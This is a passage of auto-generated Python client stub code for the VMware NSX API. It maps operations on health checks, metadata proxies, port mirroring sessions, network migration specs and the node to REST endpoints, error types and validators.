list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/manual-health-checks',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ManualHealthCheck'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ManualHealthCheck'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ManualHealthCheckListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.manual_health_checks',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _MdProxiesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'metadata_proxy': type.ReferenceType('com.vmware.nsx.model_client', 'MetadataProxy'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/md-proxies',
request_body_parameter='metadata_proxy',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'proxy_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/md-proxies/{proxy-id}',
path_variables={
'proxy_id': 'proxy-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'proxy_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/md-proxies/{proxy-id}',
path_variables={
'proxy_id': 'proxy-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/md-proxies',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'proxy_id': type.StringType(),
'metadata_proxy': type.ReferenceType('com.vmware.nsx.model_client', 'MetadataProxy'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/md-proxies/{proxy-id}',
request_body_parameter='metadata_proxy',
path_variables={
'proxy_id': 'proxy-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MetadataProxy'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MetadataProxy'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MetadataProxyListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MetadataProxy'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.md_proxies',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _MirrorSessionsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'port_mirroring_session': type.ReferenceType('com.vmware.nsx.model_client', 'PortMirroringSession'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/mirror-sessions',
request_body_parameter='port_mirroring_session',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'mirror_session_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/mirror-sessions/{mirror-session-id}',
path_variables={
'mirror_session_id': 'mirror-session-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'mirror_session_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/mirror-sessions/{mirror-session-id}',
path_variables={
'mirror_session_id': 'mirror-session-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/mirror-sessions',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'mirror_session_id': type.StringType(),
'port_mirroring_session': type.ReferenceType('com.vmware.nsx.model_client', 'PortMirroringSession'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/mirror-sessions/{mirror-session-id}',
request_body_parameter='port_mirroring_session',
path_variables={
'mirror_session_id': 'mirror-session-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for verify operation
verify_input_type = type.StructType('operation-input', {
'mirror_session_id': type.StringType(),
})
verify_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
verify_input_value_validator_list = [
]
verify_output_validator_list = [
]
verify_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/mirror-sessions/{mirror-session-id}?action=verify',
path_variables={
'mirror_session_id': 'mirror-session-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'PortMirroringSession'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'PortMirroringSession'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'PortMirroringSessionListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'PortMirroringSession'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
'verify': {
'input_type': verify_input_type,
'output_type': type.VoidType(),
'errors': verify_error_dict,
'input_value_validator_list': verify_input_value_validator_list,
'output_validator_list': verify_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
'verify': verify_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.mirror_sessions',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _NetworkMigrationSpecsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'network_migration_spec': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'NetworkMigrationSpec')]),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/network-migration-specs',
request_body_parameter='network_migration_spec',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'template_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/network-migration-specs/{template-id}',
path_variables={
'template_id': 'template-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'template_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/network-migration-specs/{template-id}',
path_variables={
'template_id': 'template-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'include_system_owned': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
'type': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/network-migration-specs',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'include_system_owned': 'include_system_owned',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
'type': 'type',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'template_id': type.StringType(),
'network_migration_spec': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'NetworkMigrationSpec')]),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/network-migration-specs/{template-id}',
request_body_parameter='network_migration_spec',
path_variables={
'template_id': 'template-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'NetworkMigrationSpec')]),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'NetworkMigrationSpec')]),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'NetworkMigrationSpecListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'NetworkMigrationSpec')]),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.network_migration_specs',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _NodeStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/node',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for restart operation
restart_input_type = type.StructType('operation-input', {})
restart_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
restart_input_value_validator_list = [
]
restart_output_validator_list = [
]
restart_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/node?action=restart',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for setsystemtime operation
setsystemtime_input_type = type.StructType('operation-input', {
'node_time': type.ReferenceType('com.vmware.nsx.model_client', 'NodeTime'),
})
setsystemtime_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.concurrent_change':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ConcurrentChange'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
setsystemtime_input_value_validator_list = [
]
setsystemtime_output_validator_list = [
]
setsystemtime_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/node?action=set_system_time',
request_body_parameter='node_time',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for shutdown operation
shutdown_input_type = type.StructType('operation-input', {})
shutdown_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
shutdown_input_value_validator_list = [
]
shutdown_output_validator_list = [
]
shutdown_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/node?action=shutdown',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'node_properties': type.ReferenceType('com.vmware.nsx.model_client', 'NodeProperties'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
